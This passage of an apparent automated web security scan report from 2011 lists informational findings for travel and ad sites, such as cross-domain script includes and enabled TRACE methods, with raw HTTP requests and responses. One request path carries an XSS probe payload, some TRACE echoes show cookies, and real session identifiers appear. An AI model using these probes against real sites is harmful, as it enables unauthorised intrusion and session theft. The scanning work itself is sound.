                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</form>


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...

20.111. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621533; expires=Tue, 02-Oct-2012 00:58:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:53 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</form>


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...

20.112. http://www.sabretravelnetwork.com/images/home-text.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/home-text.png HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618474; expires=Tue, 02-Oct-2012 00:07:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:55 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</form>


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...

20.113. http://www.sabretravelnetwork.com/map.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /map.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /map.html HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; exp_last_activity=1317618416; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 03 Feb 2010 21:57:53 GMT
ETag: "ec8c01-b432-4f665a40"
Accept-Ranges: bytes
Content-Length: 46130
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</title>

<script src="http://asset.userfly.com/users/20826/userfly.js" type="text/javascript"></script>
...[SNIP]...

20.114. http://www.travelocity.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/resolve/default
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 176568
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:04 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE]><![endif]-->
<html x
...[SNIP]...
<head>

    <script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/js/mbox.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/js/tracking_tags_US.js"></script>
...[SNIP]...
</script> <script language="JavaScript" type="text/javascript" src="http://i.travelpn.com/js/calendar_datepicker.js"></script>
...[SNIP]...

20.115. http://www.travelocity.com/472a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /472a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /472a HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:06 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 178468
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:06 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/js/tracking_tags_US.js"></script>
...[SNIP]...
</script> <script language="JavaScript" type="text/javascript" src="http://i.travelpn.com/js/calendar_datepicker.js"></script>
...[SNIP]...
</script>
   
   <script language="JavaScript" type="text/javascript" src="http://design.dev.sabre.com/htdocs/group/fgaleano/JSONtoXML/jquery.base64.js"></script>
...[SNIP]...

20.116. http://www.travelocity.com/popWindow2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9512
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:50 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
</div>

   <script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/js/mbox.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jQuery/1.4.3/jquery-1.4.3.min.js"></script>
...[SNIP]...

20.117. http://www.trip.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trip.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.trip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:35:01 GMT
Server: Apache/2.2.18 (Unix) DAV/2 mod_jk/1.2.23
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "ab4c-4ad908dfe6d00"
Accept-Ranges: bytes
ntCoent-Length: 43852
Content-Type: text/html
Cache-Control: private
Content-Length: 43852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Cheap Flights, Hotels &amp; Trips | Trip.com</title>
...[SNIP]...
</script>    
<script type="text/javascript" src="http://media.away.com/trip/tripjs/combined_javascript1-min.js"></script>
<script type="text/javascript" src="http://media.away.com/trip/tripjs/mbox.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<!-- end move to compare rates js, replace swapWidgetFormCompareRates -->
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/dcl/provider_data_map-min.js"></script>
...[SNIP]...
</script> -->
   <script language="JavaScript" src="http://media.away.com/trip/tripjs/s_code.js"></script>
   <!-- End SiteCatalyst Code -->
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/jquery/autofill-jquery-min.js"></script>
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/jquery/autofill-helper-min.js"></script>
...[SNIP]...

20.118. http://www.trip.com/box_ad_refresh.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trip.com
Path:   /box_ad_refresh.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /box_ad_refresh.html?type= HTTP/1.1
Host: www.trip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e3442f45525d5f4f58455e445a4a423660; NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660; __utma=245868737.2049523975.1317602099.1317602099.1317602099.1; __utmb=245868737.2.10.1317602099; __utmc=245868737; __utmz=245868737.1317602099.1.1.utmcsr=orbitz|utmccn=triplooking|utmcmd=crpopunder|utmcct=air; mbox=check#true#1317602160|session#1317602099178-690078#1317603960|PC#1317602099178-690078.19#1318811702; __qca=P0-1307346892-1317602104437; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D1%3B%20s_sq%3Dobtzawytrip.comprod%253D%252526pid%25253DFlights%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bjavascript%2525253AshowRndTripProviders%25252528%25252527flights%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:35:10 GMT
Server: Apache/2.2.18 (Unix) DAV/2 mod_jk/1.2.23
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "c42-4ad908dfe6d00"
Accept-Ranges: bytes
Cteonnt-Length: 3138
Content-Type: text/html
Cache-Control: private
Content-Length: 3138

<HTML>
<HEAD>
<script language="JavaScript" src="http://media.away.com/trip/tripjs/dcl/comparerates-min.js" type="text/javascript"></script>
<style>
h6.adlabel {text-align:center;color:#7E7E7E;fon
...[SNIP]...

20.119. http://www.trip.com/hotels.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trip.com
Path:   /hotels.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotels.html HTTP/1.1
Host: www.trip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e3442f45525d5f4f58455e445a4a423660; NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660; __qca=P0-1307346892-1317602104437; geoCountryCode=US; mbox=check#true#1317602171|session#1317602099178-690078#1317603971|PC#1317602099178-690078.19#1318811711; __utma=245868737.2049523975.1317602099.1317602099.1317602099.1; __utmb=245868737.3.10.1317602099; __utmc=245868737; __utmz=245868737.1317602099.1.1.utmcsr=orbitz|utmccn=triplooking|utmcmd=crpopunder|utmcct=air; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D1%3B%20s_sq%3Dobtzawytrip.comprod%253D%252526pid%25253DFlights%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.trip.com/hotels.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:36:10 GMT
Server: Apache/2.2.18 (Unix) DAV/2 mod_jk/1.2.23
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "a517-4ad908dfe6d00"
Accept-Ranges: bytes
ntCoent-Length: 42263
Content-Type: text/html
Cache-Control: private
Content-Length: 42263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Discount Hotel Rates & Cheap Trips | Trip.com</title
...[SNIP]...
</script>
<script type="text/javascript" src="http://media.away.com/trip/tripjs/combined_javascript1-min.js"></script>
<script type="text/javascript" src="http://media.away.com/trip/tripjs/mbox.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<!-- end move to compare rates js, replace swapWidgetFormCompareRates -->
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/dcl/provider_data_map-min.js"></script>
...[SNIP]...
</script> -->
   <script language="JavaScript" src="http://media.away.com/trip/tripjs/s_code.js"></script>
   <!-- End SiteCatalyst Code -->
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/jquery/autofill-jquery-min.js"></script>
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/jquery/autofill-helper-min.js"></script>
...[SNIP]...

20.120. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tripadvisor.com
Path:   /SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.1*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*TRA.true; ServerPool=T; PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:38:20 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AC.DFW*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:21 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.58*MC.13091*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals%5C.html*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:21 GMT; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 356474
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="content-type" content="text/html
...[SNIP]...
</script>
<script type='text/javascript' src='http://c1.tacdn.com/js3/tripadvisor-c-v856399127b.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src='http://c1.tacdn.com/js3/src/ta/servlet/smartdeals-v1425560272b.js'></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://c1.tacdn.com/js/tripcompat.js"></script>
...[SNIP]...
<!-- PRODUCTION -->
<script type="text/javascript" src="http://c1.tacdn.com/js3/src/trsupp-v283141723b.js"></script>
...[SNIP]...
<div class="adServer noFrame dom_en_US">
<script language=Javascript1.1 src="http://ad.doubleclick.net/adj/ta.ta.com.s/na.us.ma.boston;mcid=13091;PageType=SmartDeals;pool=T;geo=60745;u=SmartDeals%7CT;rd=com;abr=!webtv;hcm=false;hname=Boston;gname=Massachusetts;sz=728X90%2C970X66;tile=1;ord=75691953?"></script>
...[SNIP]...

21. TRACE method is enabled
There are 12 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


21.1. http://bcp.crwdcntrl.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /

Request

TRACE / HTTP/1.0
Host: bcp.crwdcntrl.net
Cookie: 613e05621c6bbe6b

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:09 GMT
Server: Apache/2.2.8 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: bcp.crwdcntrl.net
Cookie: 613e05621c6bbe6b; cc=optout


21.2. http://bh.contextweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: d16a502b92872c17

Response

HTTP/1.1 200 OK
Server: GlassFish v3
Content-Type: message/http
Content-Length: 1076
Date: Sun, 02 Oct 2011 23:49:42 GMT

TRACE / HTTP/1.1
host: bh.contextweb.com
cookie: d16a502b92872c17; C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; V=PpAVCxNh2PJr; cw=cw; cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712
...[SNIP]...

21.3. http://cacheserve.williamhill.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cacheserve.williamhill.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cacheserve.williamhill.com
Cookie: 4455a01a06e70c89

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:20 GMT
Server: MII-APC/2.1.10
P3P: CP="NON DEVa TAIa OUR BUS"
Content-Type: message/http
Content-Length: 319
Via: 1.1 sjc005158 (MII-APC/2.1)
Expires: Sun, 09 Oct 2011 23:52:20 GMT
Cache-Control: max-age=604800
X-Pb-Mii: Powered by Mirror Image Internet
Via: 1.1 sjc005092 (MII-APC/2.1)
Connection: close

TRACE / HTTP/1.1
host: serve.williamhill.com
cookie: 4455a01a06e70c89
via: 1.0 sjc005092 (MII-APC/2.1)
x-forwarded-for: 50.23.123.106, 10.172.105.2
x-mii-max-forwards: 4
x-mii-transaction-id: wap2.sjc-26403.0000000326-1317599539-0030473588
x-mii-request-host: cache
...[SNIP]...

21.4. http://d.tradex.openx.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /

Request

TRACE / HTTP/1.0
Host: d.tradex.openx.com
Cookie: 1c42f8d3a07893f9

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:00 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d.tradex.openx.com
